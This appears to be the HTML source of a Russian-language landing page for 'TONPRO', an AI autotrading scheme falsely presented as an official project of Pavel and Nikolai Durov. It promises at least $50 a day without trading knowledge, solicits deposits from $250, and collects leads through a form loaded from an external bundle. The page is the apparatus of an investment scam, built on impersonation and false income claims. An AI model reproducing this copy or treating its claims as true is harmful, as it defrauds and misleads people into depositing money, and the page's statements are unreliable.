<!DOCTYPE html>
<html lang="ru">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <base href="." />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Официальный проект от Павла Дурова2</title>
    <link rel="canonical" href="https://onlineformaa.com" />
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="//fonts.googleapis.com/css2?family=Montserrat:wght@400;700&display=swap"
      rel="stylesheet"
    />
    <link rel="shortcut icon" type="image/ico" href="img/favicon.ico" />
    <link rel="stylesheet" href="css/style.css" />
    <link rel="stylesheet" href="css/form-style.css" />
    <link
      rel="stylesheet"
      href="https://cdn.unitedmarkets.cc/build/bundle.css?v=1637321581"
    />
  </head>
  <body>
    <div class="wrapper">
      <div class="header">
        <div class="container">
          <img class="header__logo" src="img/logo.png" alt="" />
          <div class="header__inner">
            <img class="header__animation" src="img/animation.png" alt="" />
            <img class="header__animation-2" src="img/animation-2.png" alt="" />
            <img class="header__animation-3" src="img/animation-2.png" alt="" />
            <img class="header__animation-4" src="img/animation-2.png" alt="" />
            <img class="header__animation-5" src="img/animation-2.png" alt="" />
            <div class="header__box">
              <img src="img/logo.png" alt="" />
              <h2 class="header__title">
                <span class="blue">Запустите</span> ваш онлайн-заработок в
                режиме автопилота
              </h2>
              <p class="header__text">
                Революционная программа, на основе искусственного интеллекта от
                Павла и Николая Дуровых
              </p>
              <a class="header__link" href="#form-register-lead">
                НАЧАТЬ ЗАРАБАТЫВАТЬ
              </a>
            </div>
            <div class="header__video">
              <script src="players/k0KLaE2a-PbLFVgxG.js"></script>
            </div>
          </div>
          <div class="header__img-box">
            <img src="img/header-1.png" alt="" />
            <img src="img/header-2.png" alt="" />
            <img src="img/header-3.png" alt="" />
          </div>
        </div>
      </div>
      <main class="main">
        <div class="about">
          <h2 class="about__info-title mob">
            ЗАПУСК ЭКОСИСТЕМЫ
            <span class="blue"> ЗАРАБОТКА TONPRO </span>
          </h2>
          <div class="container">
            <div class="about__inner">
              <div class="about__img">
                <img src="img/about.jpg" alt="" />
              </div>
              <div class="about__info">
                <h2 class="about__info-title">
                  ЗАПУСК ЭКОСИСТЕМЫ
                  <span class="blue"> ЗАРАБОТКА TONPRO </span>
                </h2>
                <p class="about__info-text">
                  Николай и Павел Дуровы придумали блокчейн-платформу Telegram
                  Open Network (TON) в конце 2017 года. Cегодня
                  <span class="text-weight"
                    >TONPRO — это децентрализованное сообщество</span
                  >
                  разработчиков, дизайнеров, маркетологов и бизнес-девелоперов.
                  <span class="text-weight"
                    >Ключевых разработчиков можно посмотреть на сайте
                    Github</span
                  >
                  <span class="blue">
                    а начать зарабатывать с Tonpro - на официальном сайте
                  </span>
                </p>
                <p class="about__info-text">
                  Проект создан для любых финансовых и нефинансовых транзакций,
                  а также чтобы объединить разрозненные блокчейны в
                  децентрализованную глобальную сеть. На деле это значит, что
                  <span class="text-weight"
                    >глобальная сеть отслеживает и анализирует миллионы сделок.
                    Самые выгодные дублируются алгоритмом автотрейдинга
                    Toncoin,</span
                  >
                  в ту же секунду, моментально. Потому тысячи партнеров уже
                  зарабатывают от $50 в день без специальных знаний в сфере
                  трейдинга.
                </p>
              </div>
            </div>
          </div>
        </div>
        <section class="form-bottom">
          <div class="container">
            <div class="form-bottom__inner">
              <div class="form-bottom__info">
                <div class="form-bottom__box">
                  <img src="img/form-1.png" alt="" />
                  <p class="form-bottom__box-text">
                    <span class="blue2">
                      Внести депозит и получить стабильный заработок
                    </span>
                    на основе инновационного метода
                  </p>
                </div>
                <div class="form-bottom__box">
                  <img src="img/form-2.png" alt="" />
                  <p class="form-bottom__box-text">
                    <span class="blue2"> Умножайте капитал (от 250 $) </span>
                    и выводите деньги на карту любого банка
                  </p>
                </div>
                <div class="form-bottom__box">
                  <img src="img/form-3.png" alt="" />
                  <p class="form-bottom__box-text">
                    <span class="blue2"> Автотрейдинг </span>
                    без необходимости иметь специальные умения в трейдинге
                  </p>
                </div>
              </div>
              <img
                class="header__animation-2"
                src="img/animation-2.png"
                alt=""
              />
              <img
                class="header__animation-3"
                src="img/animation-2.png"
                alt=""
              />
              <img
                class="header__animation-4"
                src="img/animation-2.png"
                alt=""
              />
              <img
                class="header__animation-5"
                src="img/animation-2.png"
                alt=""
              />
              <div class="form-bottom__inner">
                <img
                  class="header__animation right"
                  src="img/animation.png"
                  alt=""
                />
                <div id="form-register-lead"></div>
              </div>
            </div>
          </div>
        </section>
      </main>
      <footer class="footer">
        <div class="container">
          <div class="footer__inner">
            <img class="footer__img" src="img/logo.png" alt="" />
            <div class="footer__inner-title">
              <a href="https://policies.google.com/privacy" target="_blank">
                Политика <br />
                конфиденциальности
              </a>
              <p class="footer__inner-text">
                © 2021-<span class="current--year"></span>. - All rights
                Reserved
              </p>
            </div>
            <img src="img/footer.png" alt="" />
          </div>
        </div>
      </footer>
    </div>
    <script src="ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="js/bl.js"></script>
    <style>
      .error {
        background-color: rgba(255, 0, 0, 0.6) !important;
        color: #fff;
      }
      .error::placeholder {
        color: #000 !important;
      }
      .valid {
        background-color: rgba(0, 255, 0, 0.6) !important;
      }
      .modal_phone {
        opacity: 1;
        position: fixed;
        top: 0;
        bottom: 0;
        right: 0;
        left: 0;
        z-index: 99999;
        display: none;
        outline: 0;
        padding-right: 15px;
        justify-content: center;
        align-items: center;
        background-color: rgba(0, 0, 0, 0.4);
        overflow-x: hidden;
        overflow-y: auto;
        color: #000;
      }
      .modal_phone.open_phone {
        display: flex;
      }
      .modal-open_phone {
        overflow: hidden;
      }
      .modal-dialog_phone {
        position: relative;
        width: 100%;
        max-width: 32rem;
        padding: 1rem;
        box-sizing: border-box;
      }
      .modal-content_phone {
        display: flex;
        flex-direction: column;
        pointer-events: auto;
        background-color: #fff;
        background-clip: padding-box;
        border: 1px solid rgba(0, 0, 0, 0.2);
        border-radius: 0.3rem;
        outline: 0;
      }
      .modal-header_phone {
        display: flex;
        align-items: center;
        padding: 1rem 1rem;
      }
      .modal-header_phone {
        justify-content: space-between;
        border-top-left-radius: 0.3rem;
        border-top-right-radius: 0.3rem;
      }
      .modal-body_phone {
        position: relative;
        flex: 1 1 auto;
        padding: 1rem;
      }
      .modal-title_phone {
        font-size: 1.25rem;
        font-weight: 600;
      }
      .close-button_phone {
        font-size: 1.5rem;
        font-weight: 700;
        line-height: 1;
        opacity: 0.5;
        background-color: transparent;
        border: 0;
        cursor: pointer;
        padding: 1rem 1rem;
        margin: -1rem -1rem -1rem auto;
      }
    </style>
    <div id="modal_phone" class="modal_phone fade_phone" tabindex="-1">
      <div class="modal-dialog_phone">
        <div class="modal-content_phone">
          <div class="modal-header_phone">
            <h5 class="modal-title_phone">Неверный телефон</h5>
            <button
              type="button"
              class="close-button_phone"
              id="close-button_phone"
            >
              ×
            </button>
          </div>
          <div class="modal-body_phone">
            Прошу прощения! Программа не совместима с вашим регионом. Введите
            свой европейский членский номер
          </div>
        </div>
      </div>
    </div>

    <script
      defer=""
      src="https://cdn.unitedmarkets.cc/build/bundle.js?v=1637321581"
    ></script>
  </body>
</html>
